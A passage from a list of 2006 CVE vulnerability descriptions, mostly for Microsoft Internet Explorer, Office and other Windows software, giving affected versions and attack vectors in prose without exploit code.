certain parameters in the Microsoft Networking configuration. NOTE: vector 1 might be the same as CVE-2006-5290. [CVE-2006-6334] Heap-based buffer overflow in the SendChannelData function in wfica.ocx in Citrix Presentation Server Client before 9.230 for Windows allows remote malicious web sites to execute arbitrary code via a DataSize parameter that is less than the length of the Data buffer. [CVE-2006-6311] Microsoft Internet Explorer 6.0.2900.2180 allows remote attackers to cause a denial of service via a style attribute in an HTML table tag with a width value that is dynamically calculated using JavaScript. [CVE-2006-6310] Microsoft Internet Explorer 6.0 SP1 and earlier allows remote attackers to cause a denial of service (crash) via an invalid src attribute value ("?") in an HTML frame tag that is in a frameset tag with a large rows attribute. NOTE: The provenance of this information is unknown [CVE-2006-6308] * DISPUTED Symantec LiveState 7.1 Agent for Windows allows local users to gain privileges by stopping the shstart.exe process and open "Web Self-Service" from the system tray icon, which will open a browser window running with elevated privileges. NOTE: several third-party researchers have noted that administrator privileges may be necessary to terminate shstart.exe. If this is the case, then no privilege escalation occurs, and this is not a vulnerability. [CVE-2006-6307] srvloc.sys in Novell Client for Windows before 4.91 SP3 allows remote attackers to cause an unspecified denial of service via a crafted packet to port 427 that triggers an access of pageable or invalid addresses using a higher interrupt request level (IRQL) than necessary. [CVE-2006-6133] Stack-based buffer overflow in Visual Studio Crystal Reports for Microsoft Visual Studio .NET 2002 and 2002 SP1, .NET 2003 and 2003 SP1, and 2005 and 2005 SP1 (formerly Business Objects Crystal Reports XI Professional) allows user-assisted remote attackers to execute arbitrary code via a crafted RPT file. [CVE-2006-6120] Integer overflow in the KPresenter import filter for Microsoft PowerPoint files (filters/olefilters/lib/klaola.cc) in KOffice before 1.6.1 allows user-assisted remote attackers to execute arbitrary code via a crafted PPT file, which results in a heap-based buffer overflow. [CVE-2006-5994] Unspecified vulnerability in Microsoft Word 2000 and 2002, Office Word and Word Viewer 2003, Word 2004 and 2004 v. X for Mac, and Works 2004, 2005, and 2006 allows remote attackers to execute arbitrary code via a Word document with a malformed string that triggers memory corruption, a different vulnerability than CVE-2006-6456. [CVE-2006-5988] Unspecified vulnerability in Windows 2000 Advanced Server SP4 running Active Directory allows remote attackers to cause a denial of service via unknown vectors, as demonstrated by a certain VulnDisco Pack module. NOTE: the provenance of this information is unknown [CVE-2006-5961] Buffer overflow in Mercury Mail Transport System 4.01b for Windows has unknown impact and attack vectors, as originally reported in a GLEG VulnDisco pack. NOTE: the provenance of this information is unknown [CVE-2006-5913] Microsoft Internet Explorer 7 allows remote attackers to (1) cause a security certificate from a secure web site to appear invalid via a link to res://ieframe.dll/sslnavcancel.htm with the target site in the anchor identifier, which displays the site's URL in the address bar but causes Internet Explorer to report that the certificate is invalid, or (2) trigger a "The webpage no longer exists" report via a link to res://ieframe.dll/http_410.htm, a variant of CVE-2006-5805. [CVE-2006-5884] Multiple unspecified vulnerabilities in DirectAnimation ActiveX controls for Microsoft Internet Explorer 5.01 through 6 have unknown impact and remote attack vectors, possibly related to (1) Danim.dll and (2) Lmrt.dll, a different set of vulnerabilities than CVE-2006-4446 and CVE-2006-4777. [CVE-2006-5858] Adobe ColdFusion MX 7 through 7.0.2, and JRun 4, when run on Microsoft IIS, allows remote attackers to read arbitrary files, list directories, or read source code via a double URL-encoded NULL byte in a ColdFusion filename, such as a CFM file. [CVE-2006-5850] Stack-based buffer overflow in Essentia Web Server 2.15 for Windows allows remote attackers to execute arbitrary code via a long URI, as demonstrated by a GET or HEAD request. NOTE: some of these details are obtained from third party information. [CVE-2006-5805] Microsoft Internet Explorer 7 allows remote attackers to cause a security certificate from a secure web site to appear invalid via a link to res://ieframe.dll/invalidcert.htm with the target site as an argument, which displays the site's URL in the address bar but causes Internet Explorer to report that the certificate is invalid. [CVE-2006-5581] Unspecified vulnerability in Microsoft Internet Explorer 6 allows remote attackers to execute arbitrary code via certain DHTML script functions, such as normalize, and "incorrectly created elements" that trigger memory corruption, aka "DHTML Script Function Memory Corruption Vulnerability." [CVE-2006-5579] Microsoft Internet Explorer 6 allows remote attackers to execute arbitrary code by using JavaScript to cause certain errors simultaneously, which results in the access of previously freed memory, aka "Script Error Handling Memory Corruption Vulnerability." [CVE-2006-5578] Microsoft Internet Explorer 6 and earlier allows remote attackers to read Temporary Internet Files (TIF) and obtain sensitive information via unspecified vectors involving certain drag and drop operations, aka "TIF Folder Information Disclosure Vulnerability," and a different issue than CVE-2006-5577. [CVE-2006-5577] Microsoft Internet Explorer 6 and earlier allows remote attackers to obtain sensitive information via unspecified uses of the OBJECT HTML tag, which discloses the absolute path of the corresponding TIF folder, aka "TIF Folder Information Disclosure Vulnerability," and a different issue than CVE-2006-5578. [CVE-2006-5574] Unspecified vulnerability in the Brazilian Portuguese Grammar Checker in Microsoft Office 2003 and the Multilingual Interface for Office 2003, Project 2003, and Visio 2003 allows user-assisted remote attackers to execute arbitrary code via crafted text that is not properly parsed. [CVE-2006-5559] The Execute method in the ADODB.Connection 2.7 and 2.8 ActiveX control objects (ADODB.Connection.2.7 and ADODB.Connection.2.8) in the Microsoft Data Access Components (MDAC) 2.5 SP3, 2.7 SP1, 2.8, and 2.8 SP1 does not properly track freed memory when the second argument is a BSTR, which allows remote attackers to cause a denial of service (Internet Explorer crash) and possibly execute arbitrary code via certain strings in the second and third arguments. [CVE-2006-5544] Visual truncation vulnerability in Microsoft Internet Explorer 7 allows remote attackers to spoof the address bar and possibly conduct phishing attacks via a malicious URL containing non-breaking spaces (%A0), which causes the address bar to omit some characters from the URL. [CVE-2006-5395] Buffer overflow in Microsoft Class Package Export Tool (aka clspack.exe) allows context-dependent attackers to execute arbitrary code via a long string. NOTE: the provenance of this information is unknown [CVE-2006-5330] CRLF injection vulnerability in Adobe Flash Player plugin 9.0.16 and earlier for Windows, 7.0.63 and earlier for Linux, 7.x before 7.0 r67 for Solaris, and before 9.0.28.0 for Mac OS X, allows remote attackers to modify HTTP headers of client requests and conduct HTTP Request Splitting attacks via CRLF sequences in arguments to the ActionScript functions (1) XML.addRequestHeader and (2) XML.contentType. NOTE: the flexibility of the attack varies depending on the type of web browser being used. [CVE-2006-5296] PowerPoint in Microsoft Office 2003 does not properly handle a container object whose position value exceeds the record length, which allows user-assisted attackers to cause a denial of service (NULL dereference and application crash) via a crafted PowerPoint (.PPT) file, as demonstrated by Nanika.ppt, and a different vulnerability than CVE-2006-3435, CVE-2006-3876, CVE-2006-3877, and CVE-2006-4694. NOTE: the impact of this issue was originally claimed to be arbitrary code execution, but later analysis demonstrated that this was erroneous. [CVE-2006-5266] Multiple buffer overflows in Microsoft Dynamics GP (formerly Great Plains) 9.0 and earlier allow remote attackers to execute arbitrary code via (1) a crafted Distributed Process Manager (DPM) message to the (a) DPM component, or a (2) long string or (3) long IP address in a Distributed Process Server (DPS) message to the DPM or (b) DPS component. [CVE-2006-5265] Unspecified vulnerability in Microsoft Dynamics GP (formerly Great Plains) 9.0 and earlier allows remote attackers to cause a denial of service (crash) via an invalid magic number in a Distributed Process Server (DPS) message. [CVE-2006-5162] wininet.dll in Microsoft Internet Explorer 6.0 SP2 and earlier allows remote attackers to cause a denial of service (unhandled exception and crash) via a long Content-Type header, which triggers a stack overflow. [CVE-2006-5152] Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer allows remote attackers to inject arbitrary web script or HTML via a UTF-7 encoded URL that is returned in a large HTTP 404 error message without an explicit charset, a related issue to CVE-2006-0032. [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname. [CVE-2006-4981] Symantec Sygate NAC allows physically proximate attackers to bypass control methods and join a local network by selecting a forged MAC address associated with an exception rule that (1) permits all non-Windows devices or (2) whitelists certain sets of Organizationally Unique Identifiers (OUIs). [CVE-2006-4899] The ePPIServlet script in Computer Associates (CA) eTrust Security Command Center 1.0 and r8 up to SP1 CR2, when running on Windows, allows remote attackers to obtain the web server path via a "'" (single quote) in the PIProfile function, which leaks the path in an error message. [CVE-2006-4888] Microsoft Internet Explorer 6 and earlier allows remote attackers to cause a denial of service (application hang) via a CSS-formatted HTML INPUT element within a DIV element that has a larger size than the INPUT. [CVE-2006-4854] REJECT Unspecified vulnerability in Microsoft Office 2000 (Chinese Edition) and Microsoft PowerPoint 2000 (Chinese Edition) allows user-assisted attackers to execute arbitrary code via a crafted PPT document, as exploited by malware such as Trojan.PPDropper.E. NOTE: on 20060919, Microsoft notified CVE that this is a duplicate of CVE-2006-0009. [CVE-2006-4777] Heap-based buffer overflow in the DirectAnimation Path Control (DirectAnimation.PathControl) COM object (daxctle.ocx) for Internet Explorer 6.0 SP1, on Chinese and possibly other Windows distributions, allows remote attackers to execute arbitrary code via unknown manipulations in arguments to the KeyFrame method, possibly related to an integer overflow, as demonstrated by daxctle2, and a different vulnerability than CVE-2006-4446. [CVE-2006-4732] Unspecified vulnerability in Microsoft Visual Basic (VB) 6 has an unknown impact ("overflow") via a project that contains a certain Click event procedure, as demonstrated using the msgbox function and the VB.Label object. [CVE-2006-4704] Cross-zone scripting vulnerability in the WMI Object Broker (WMIScriptUtils.WMIObjectBroker2) ActiveX control (WmiScriptUtils.dll) in Microsoft Visual Studio 2005 allows remote attackers to bypass Internet zone restrictions and execute arbitrary code by instantiating dangerous objects, aka "WMI Object Broker Vulnerability." [CVE-2006-4697] Microsoft Internet Explorer 5.01, 6, and 7 uses certain COM objects from Imjpcksid.dll as ActiveX controls, which allows remote attackers to execute arbitrary code via unspecified vectors. NOTE: this issue might be related to CVE-2006-4193. [CVE-2006-4695] Unspecified vulnerability in certain COM objects in Microsoft Office Web Components 2000 allows user-assisted remote attackers to execute arbitrary code via a crafted URL, aka "Office Web Components URL Parsing Vulnerability." [CVE-2006-4693] Unspecified vulnerability in Microsoft Word 2004 for Mac and v.X for Mac allows remote user-assisted attackers to execute arbitrary code via a crafted string in a Word file, a different issue than CVE-2006-3647 and CVE-2006-3651. [CVE-2006-4687] Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via crafted layout combinations involving DIV tags and HTML CSS float properties that trigger memory corruption, aka "HTML Rendering Memory Corruption Vulnerability." [CVE-2006-4686] Buffer overflow in the Extensible Stylesheet Language Transformations (XSLT) processing in Microsoft XML Parser 2.6 and XML Core Services 3.0 through 6.0 allows remote attackers to execute arbitrary code via a crafted Web page. [CVE-2006-4685] The XMLHTTP ActiveX control in Microsoft XML Parser 2.6 and XML Core Services 3.0 through 6.0 does not properly handle HTTP server-side redirects, which allows remote user-assisted attackers to access content from other domains. [CVE-2006-4627] System Information ActiveX control (msinfo.dll), when accessed via Microsoft Internet Explorer, allows remote attackers to cause a denial of service (crash) via a SaveFile function with a long (1) computer and possibly (2) filename and (3) category argument. [CVE-2006-4614] PDAapps Verichat for Pocket PC 1.30bh stores usernames and passwords in plaintext in the Windows Mobile registry, which allows local users to obtain sensitive information via keys under \HKEY_CURRENT_USER\Software\PDAapps\VeriChat. [CVE-2006-4613] Multiple unspecified vulnerabilities in SnapGear before 3.1.4u1 allow remote attackers to cause a denial of service via unspecified vectors involving (1) IPSec replay windows and (2) the use of vulnerable versions of ClamAV before 0.88.4. NOTE: it is possible that vector 2 is related to CVE-2006-4018. [CVE-2006-4560] Internet Explorer 6 on Windows XP SP2 allows remote attackers to execute arbitrary JavaScript in the context of the browser's session with an arbitrary intranet web server, by hosting script on an Internet web server that can be made inaccessible by the attacker and that has a domain name under the attacker's control, which can force the browser to drop DNS pinning and perform a new DNS query for the domain name after the script is already running. [CVE-2006-4534] Unspecified vulnerability in Microsoft Word 2000, 2002, and Office 2003 allows remote user-assisted attackers to execute arbitrary code via unspecified vectors involving a crafted file resulting in a malformed stack, as exploited by malware with names including Trojan.Mdropper.Q, Mofei, and Femo. [CVE-2006-4513] Multiple integer overflows in the WV library in wvWare (formerly mswordview) before 1.2.3, as used by AbiWord, KWord, and possibly other products, allow user-assisted remote attackers to execute arbitrary code via a crafted Microsoft Word (DOC) file that produces (1) large LFO clfolvl values in the wvGetLFO_records function or (2) a large LFO nolfo value in the wvGetFLO_PLF function. [CVE-2006-4494] Microsoft Visual Studio 6.0 allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code by instantiating certain Visual Studio 6.0 ActiveX COM Objects in Internet Explorer, including (1) tcprops.dll, (2) fp30wec.dll, (3) mdt2db.dll, (4) mdt2qd.dll, and (5) vi30aut.dll. [CVE-2006-4492] Unspecified vulnerability in Cybozu Office 6.5 Build 1.2 for Windows allows remote attackers to obtain sensitive information, including users and groups, via unspecified vectors. [CVE-2006-4465] DISPUTED Microsoft Terminal Server, when running an application session with the "Start program at logon" and "Override settings from user profile and Client Connection Manager wizard" options, allows local users to execute arbitrary code by forcing an Explorer error. NOTE: a third-party researcher has stated that the options are "a convenience to users" and were not intended to restrict execution of arbitrary code. [CVE-2006-4446] Heap-based buffer overflow in DirectAnimation.PathControl COM object (daxctle.ocx) in Microsoft Internet Explorer 6.0 SP1 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a Spline function call whose first argument specifies a large number of points. [CVE-2006-4444] Multiple SQL injection vulnerabilities in Cybozu Garoon 2.1.0 for Windows allow remote authenticated users to execute arbitrary SQL commands via the (1) tid parameter in the (a) todo/view (aka TODO List View), (b) todo/modify (aka TODO List Modify), or (c) todo/delete functionality [CVE-2006-4359] Stack-based buffer overflow in Trident Software PowerZip 7.06 Build 3895 on Windows 2000 allows remote attackers to execute arbitrary code via a ZIP archive containing a long filename. [CVE-2006-4332] Unspecified vulnerability in the DHCP dissector in Wireshark (formerly Ethereal) 0.10.13 through 0.99.2, when run on Windows, allows remote attackers to cause a denial of service (crash) via unspecified vectors that trigger a bug in Glib. [CVE-2006-4315] Unquoted Windows search path vulnerability in multiple SSH Tectia products, including Client/Server/Connector 5.0.0 and 5.0.1 and Client/Server before 4.4.5, and Manager 2.12 and earlier, when running on Windows, might allow local users to gain privileges via a malicious program file under "Program Files" or its subdirectories. [CVE-2006-4309] VNC server on the AK-Systems Windows Terminal 1.2.5 ExVLP is not password protected, which allows remote attackers to login and view RDP or Citrix sessions. [CVE-2006-4301] Microsoft Internet Explorer 6.0 SP1 allows remote attackers to cause a denial of service (crash) via a long Color attribute in multiple DirectX Media Image DirectX Transforms ActiveX COM Objects from (a) dxtmsft.dll and (b) dxtmsft3.dll, including (1) DXImageTransform.Microsoft.MaskFilter.1, (2) DXImageTransform.Microsoft.Chroma.1, and (3) DX3DTransform.Microsoft.Shapes.1. [CVE-2006-4274] REJECT Unknown vulnerability in Microsoft PowerPoint allows user-assisted attackers to execute arbitrary code via a crafted PPT document, as exploited by malware such as TROJ_MDROPPER.BH. NOTE: on 20060822, it was determined that TROJ_MDROPPER.BH was exploiting CVE-2006-0009, so this is not a new vulnerability. [CVE-2006-4273] Cross-site scripting (XSS) vulnerability in Jelsoft vBulletin 3.5.4 and 3.6.0 allows remote attackers to inject arbitrary web script or HTML by uploading an attachment with a .pdf extension that contains JavaScript, which is processed as script by Microsoft Internet Explorer 6. [CVE-2006-4258] Absolute path traversal vulnerability in the get functionality in Anti-Spam SMTP Proxy (ASSP) allows remote authenticated users to read arbitrary files via (1) C:\ (Windows drive letter), (2) UNC, and possibly other types of paths in the file parameter. [CVE-2006-4193] Microsoft Internet Explorer 6.0 SP1 and possibly other versions allows remote attackers to cause a denial of service and possibly execute arbitrary code by instantiating COM objects as ActiveX controls, including (1) imskdic.dll (Microsoft IME), (2) chtskdic.dll (Microsoft IME), and (3) msoe.dll (Outlook), which leads to memory corruption. NOTE: it is not certain whether the issue is in Internet Explorer or the individual DLL files. [CVE-2006-4183] Heap-based buffer overflow in Microsoft DirectX SDK (February 2006) and probably earlier, including 9.0c End User Runtimes, allows context-dependent attackers to execute arbitrary code via a crafted Targa file with a run-length-encoding (RLE) compression that produces more data than expected when decoding. [CVE-2006-4128] Multiple heap-based buffer overflows in Symantec VERITAS Backup Exec for Netware Server Remote Agent for Windows Server 9.1 and 9.2 (all builds), Backup Exec Continuous Protection Server Remote Agent for Windows Server 10.1 (builds 10.1.325.6301, 10.1.326.1401, 10.1.326.2501, 10.1.326.3301, and 10.1.327.401), and Backup Exec for Windows Server and Remote Agent 9.1 (build 9.1.4691), 10.0 (builds 10.0.5484 and 10.0.5520), and 10.1 (build 10.1.5629) allow remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted RPC message. [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems. [CVE-2006-4098] Stack-based buffer overflow in the CSRadius service in Cisco Secure Access Control Server (ACS) for Windows before 4.1 and ACS Solution Engine before 4.1 allows remote attackers to execute arbitrary code via a crafted RADIUS Accounting-Request packet. [CVE-2006-4097] Multiple unspecified vulnerabilities in the CSRadius service in Cisco Secure Access Control Server (ACS) for Windows before 4.1 and ACS Solution Engine before 4.1 allow remote attackers to cause a denial of service (crash) via a crafted RADIUS Access-Request packet. NOTE: it has been reported that at least one issue is a heap-based buffer overflow involving the Tunnel-Password attribute. [CVE-2006-4046] Multiple stack-based buffer overflows in Open Cubic Player 2.6.0pre6 and earlier for Windows, and 0.1.10_rc5 and earlier on Linux/BSD, allow remote attackers to execute arbitrary code via (1) a large .S3M file handled by the mpLoadS3M function, (2) a crafted .IT file handled by the itplayerclass::module::load function, (3) a crafted .ULT file handled by the mpLoadULT function, or (4) a crafted .AMS file handled by the mpLoadAMS function. [CVE-2006-3945] The CSS functionality in Opera 9 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by setting the background property of a DHTML element to a long http or https URL, which triggers memory corruption. [CVE-2006-3910] Internet Explorer 6 on Windows XP SP2, when Outlook is installed, allows remote attackers to cause a denial of service (crash) by calling the NewDefaultItem function of an OVCtl (OVCtl.OVCtl.1) ActiveX object, which triggers a null dereference. [CVE-2006-3877] Unspecified vulnerability in PowerPoint in Microsoft Office 2000, Office 2002, Office 2003, Office 2004 for Mac, and Office v.X for Mac allows user-assisted attackers to execute arbitrary code via an unspecified "crafted file," a different vulnerability than CVE-2006-3435, CVE-2006-4694, and CVE-2006-3876. [CVE-2006-3876] Unspecified vulnerability in PowerPoint in Microsoft Office 2000, Office 2002, Office 2003, Office 2004 for Mac, and Office v.X for Mac allows user-assisted attackers to execute arbitrary code via a crafted Data record in a PPT file, a different vulnerability than CVE-2006-3435 and CVE-2006-4694. [CVE-2006-3875] Unspecified vulnerability in Microsoft Excel 2000, 2002, 2003, 2004 for Mac, v.X for Mac, and Excel Viewer 2003 allows user-assisted attackers to execute arbitrary code via a crafted COLINFO record in an XLS file, a different vulnerability than CVE-2006-2387 and CVE-2006-3867. [CVE-2006-3868] Unspecified vulnerability in Microsoft Office XP and 2003 allows remote user-assisted attackers to execute arbitrary code via a malformed Smart Tag. [CVE-2006-3867] Unspecified vulnerability in Microsoft Excel 2000, 2002, 2003, 2004 for Mac, v.X for Mac, and Excel Viewer 2003 allows user-assisted attackers to execute arbitrary code via a crafted Lotus 1-2-3 file, a different vulnerability than CVE-2006-2387 and CVE-2006-3875. [CVE-2006-3864] Unspecified vulnerability in mso.dll in Microsoft Office 2000, XP, and 2003, and Microsoft PowerPoint 2000, XP, and 2003, allows remote user-assisted attackers to execute arbitrary code via a malformed record in a (1) .DOC, (2) .PPT, or (3) .XLS file that triggers memory corruption, related to an "array boundary condition" (possibly an array index overflow), a different vulnerability than CVE-2006-3434, CVE-2006-3650, and CVE-2006-3868. [CVE-2006-3854] Buffer overflow in IBM Informix Dynamic Server (IDS) 9.40.TC7, 9.40.TC8, 10.00.TC4, and 10.00.TC5, when running on Windows, allows remote attackers to execute arbitrary code via a long username, which causes an overflow in vsprintf when displaying in the resulting error message. NOTE: this issue is due to an incomplete fix for CVE-2006-3853. [CVE-2006-3853] Buffer overflow in IBM Informix Dynamic Server (IDS) before 9.40.TC7 and 10.00 before 10.00.TC3, when running on Windows, allows remote attackers to execute arbitrary code via a long username. [CVE-2006-3841] Cross-site scripting (XSS) vulnerability in WebScarab before 20060718-1904, when used with Microsoft Internet Explorer 6 SP2 or Konqueror 3.5.3, allows remote attackers to inject arbitrary web script or HTML via the URL, which is not sanitized before being returned in an error message when WebScarab is not able to access the URL. [CVE-2006-3779] Citrix MetaFrame up to XP 1.0 Feature 1, except when running on Windows Server 2003, installs a registry key with an insecure ACL, which allows remote authenticated users to gain privileges. [CVE-2006-3729] DataSourceControl in Internet Explorer 6 on Windows XP SP2 with Office installed allows remote attackers to cause a denial of service (crash) via a large negative integer argument to the getDataMemberName method of a OWC11.DataSourceControl.11 object, which leads to an integer overflow and a null dereference. [CVE-2006-3697] Agnitum Outpost Firewall Pro 3.51.759.6511 (462), as used in (1) Lavasoft Personal Firewall 1.0.543.5722 (433) and (2) Novell BorderManager Novell Client Firewall 2.0, does not properly restrict user activities in application windows that run in a LocalSystem context, which allows local users to gain privileges and execute commands (a) via the "open folder" option when no instance of explorer.exe is running, possibly related to the ShellExecute API function [CVE-2006-3675] Password Safe 2.11, 2.16 and 3.0BETA1 does not respect the configuration settings for locking the password database when certain dialogue windows are open, which might allow attackers with physical access to obtain the database contents. [CVE-2006-3660] Unspecified vulnerability in Microsoft PowerPoint 2003 has unknown impact and user-assisted attack vectors related to powerpnt.exe. NOTE: due to the lack of available details as of 20060717, it is unclear how this is related to CVE-2006-3655, CVE-2006-3656, and CVE-2006-3590, although it is possible that they are all different. [CVE-2006-3659] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (crash) by setting the location or URL property of a MHTMLFile ActiveX object. [CVE-2006-3658] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (crash) by accessing the object references of a FolderItem ActiveX object, which triggers a null dereference in the security check. [CVE-2006-3657] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (stack overflow exception) via a DXImageTransform.Microsoft.Gradient ActiveX object with a long (1) StartColorStr or (2) EndColorStr property. [CVE-2006-3656] Unspecified vulnerability in Microsoft PowerPoint 2003 allows user-assisted attackers to cause memory corruption via a crafted PowerPoint file, which triggers the corruption when the file is closed. NOTE: due to the lack of available details as of 20060717, it is unclear how this is related to CVE-2006-3655, CVE-2006-3660, and CVE-2006-3590, although it is possible that they are all different. [CVE-2006-3655] Unspecified vulnerability in mso.dll in Microsoft PowerPoint 2003 allows user-assisted attackers to execute arbitrary code via a crafted PowerPoint file. NOTE: due to the lack of available details as of 20060717, it is unclear how this is related to CVE-2006-3656, CVE-2006-3660, and CVE-2006-3590, although it is possible that they are all different. [CVE-2006-3654] Buffer overflow in wksss.exe 8.4.702.0 in Microsoft Works Spreadsheet 8.0 allows remote attackers to cause a denial of service (CPU consumption or crash) via crafted Excel files. [CVE-2006-3653] wksss.exe 8.4.702.0 in Microsoft Works Spreadsheet 8.0 allows remote attackers to cause a denial of service (CPU consumption or crash) via crafted (1) Works, (2) Excel, and (3) Lotus 1-2-3 files. [CVE-2006-3652] Microsoft Internet Security and Acceleration (ISA) Server 2004 allows remote attackers to bypass file extension filters via a request with a trailing "#" character. NOTE: as of 20060715, this could not be reproduced by third parties. [CVE-2006-3651] Unspecified vulnerability in Microsoft Word 2000, 2002, and Office 2003 allows remote user-assisted attackers to execute arbitrary code via a crafted mail merge file, a different vulnerability than CVE-2006-3647 and CVE-2006-4693. [CVE-2006-3650] Microsoft Office 2000, XP, 2003, 2004 for Mac, and v.X for Mac do not properly parse the length of a chart record, which allows remote user-assisted attackers to execute arbitrary code via a Word document with an embedded malformed chart record that triggers an overwrite of pointer values with values from the document, a different vulnerability than CVE-2006-3434, CVE-2006-3864, and CVE-2006-3868. [CVE-2006-3649] Buffer overflow in Microsoft Visual Basic for Applications (VBA) SDK 6.0 through 6.4, as used by Microsoft Office 2000 SP3, Office XP SP3, Project 2000 SR1, Project 2002 SP1, Access 2000 Runtime SP3, Visio 2002 SP2, and Works Suite 2004 through 2006, allows user-assisted attackers to execute arbitrary code via unspecified document properties that are not verified when VBA is invoked to open documents. [CVE-2006-3647] Integer overflow in Microsoft Word 2000, 2002, 2003, 2004 for Mac, and v.X for Mac allows remote user-assisted attackers to execute arbitrary code via a crafted string in a Word document, which overflows a 16-bit integer length value, aka "Memmove Code Execution," a different vulnerability than CVE-2006-3651 and CVE-2006-4693. [CVE-2006-3640] Microsoft Internet Explorer 5.01 and 6 allows certain script to persist across navigations between pages, which allows remote attackers to obtain the window location of visited web pages in other domains or zones, aka "Window Location Information Disclosure Vulnerability." [CVE-2006-3639] Microsoft Internet Explorer 5.01 and 6 does not properly identify the originating domain zone when handling redirects, which allows remote attackers to read cross-domain web pages and possibly execute code via unspecified vectors involving a crafted web page, aka "Source Element Cross-Domain Vulnerability." [CVE-2006-3638] Microsoft Internet Explorer 5.01 and 6 does not properly handle uninitialized COM objects, which allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code, as demonstrated by the Nth function in the DirectAnimation.DATuple ActiveX control, aka "COM Object Instantiation Memory Corruption Vulnerability." [CVE-2006-3637] Microsoft Internet Explorer 5.01 SP4 and 6 does not properly handle various HTML layout component combinations, which allows user-assisted remote attackers to execute arbitrary code via a crafted HTML file that leads to memory corruption, aka "HTML Rendering Memory Corruption Vulnerability." [CVE-2006-3605] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (crash) by setting the Transition property on an uninitialized DXImageTransform.Microsoft.RevealTrans.1 ActiveX Object, which triggers a null dereference. [CVE-2006-3601] UNVERIFIABLE Unspecified vulnerability in an unspecified DNN Modules module for DotNetNuke (.net nuke) allows remote attackers to gain privileges via unspecified vectors, as used in an attack against the Microsoft France web site. NOTE: due to the lack of details and uncertainty about which product is affected, this claim is not independently verifiable. [CVE-2006-3591] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (application crash) by accessing the URL property of a TriEditDocument.TriEditDocument object before it has been initialized, which triggers a NULL pointer dereference. [CVE-2006-3590] mso.dll, as used by Microsoft PowerPoint 2000 through 2003, allows user-assisted attackers to execute arbitrary commands via a malformed shape container in a PPT file that leads to memory corruption, as exploited by Trojan.PPDropper.B, a different issue than CVE-2006-1540 and CVE-2006-3493. [CVE-2006-3545] DISPUTED ** Microsoft Internet Explorer 7.0 Beta allows remote attackers to cause a denial of service (application crash) via a web page with multiple empty APPLET start tags. NOTE: a third party has disputed this issue, stating that the crash does not occur with Microsoft Internet Explorer 7.0 Beta3. [CVE-2006-3513] danim.dll in Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (application crash) by accessing the Data property of a DirectAnimation DAUserData object before it is initialized, which triggers a NULL pointer dereference. [CVE-2006-3512] Internet Explorer 6 on Windows XP allows remote attackers to cause a denial of service (crash) by setting the Enabled property of a DXTFilter ActiveX object to true, which triggers a null dereference. [CVE-2006-3511] Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by setting the fonts property of the HtmlDlgSafeHelper object, which triggers a null dereference. [CVE-2006-3493] Buffer overflow in LsCreateLine function (mso_203) in mso.dll and mso9.dll, as used by Microsoft Word and possibly other products in Microsoft Office 2003, 2002, and 2000, allows remote user-assisted attackers to cause a denial of service (crash) via a crafted Word DOC or other Office file type. NOTE: this issue was originally reported to allow code execution, but on 20060710 Microsoft stated that code execution is not possible, and the original researcher agrees. [CVE-2006-3488] Absolute path traversal vulnerability in administrador.asp in VirtuaStore 2.0 allows remote attackers to possibly read arbitrary directories or files via an absolute path with Windows drive letter in the Pasta parameter when link=util, acao=ftp, and acaba=sim. [CVE-2006-3472] Microsoft Internet Explorer 6.0 and 6.0 SP1 allows remote attackers to cause a denial of service via an HTML page with an A tag containing a long title attribute. NOTE: the provenance of this information is unknown [CVE-2006-3451] Microsoft Internet Explorer 5 SP4 and 6 do not properly garbage collect when "multiple imports are used on a styleSheets collection" to construct a chain of Cascading Style Sheets (CSS), which allows remote attackers to execute arbitrary code via unspecified vectors. [CVE-2006-3450] Microsoft Internet Explorer 6 allows remote attackers to execute arbitrary code by using the document.getElementByID Javascript function to access crafted Cascading Style Sheet (CSS) elements, and possibly other unspecified vectors involving certain layout positioning combinations in an HTML file. [CVE-2006-3449] Unspecified vulnerability in Microsoft PowerPoint 2000 through 2003, possibly a buffer overflow, allows user-assisted remote attackers to execute arbitrary commands via a malformed record in the BIFF file format used in a PPT file, a different issue than CVE-2006-1540, aka "Microsoft PowerPoint Malformed Record Vulnerability." [CVE-2006-3438] Unspecified vulnerability in Microsoft Hyperlink Object Library (hlink.dll), possibly a buffer overflow, allows user-assisted attackers to execute arbitrary code via crafted hyperlinks that are not properly handled when hlink.dll "uses a file containing a malformed function," aka "Hyperlink Object Function Vulnerability." [CVE-2006-3436] Cross-site scripting (XSS) vulnerability in Microsoft .NET Framework 2.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving "ASP.NET controls that set the AutoPostBack property to true". [CVE-2006-3435] PowerPoint in Microsoft Office 2000, XP, 2003, 2004 for Mac, and v.X for Mac does not properly parse the slide notes field in a document, which allows remote user-assisted attackers to execute arbitrary code via crafted data in this field, which triggers an erroneous object pointer calculation that uses data from within the document. NOTE: this issue is different than other PowerPoint vulnerabilities including CVE-2006-4694. [CVE-2006-3434] Unspecified vulnerability in Microsoft Office 2000, XP, 2003, 2004 for Mac, and v.X for Mac allows remote user-assisted attackers to execute arbitrary code via a crafted string that triggers memory corruption. [CVE-2006-3431] Buffer overflow in certain Asian language versions of Microsoft Excel might allow user-assisted attackers to execute arbitrary code via a crafted STYLE record in a spreadsheet that triggers the overflow when the user attempts to repair the document or selects the "Style" option, as demonstrated by nanika.xls. NOTE: Microsoft has confirmed 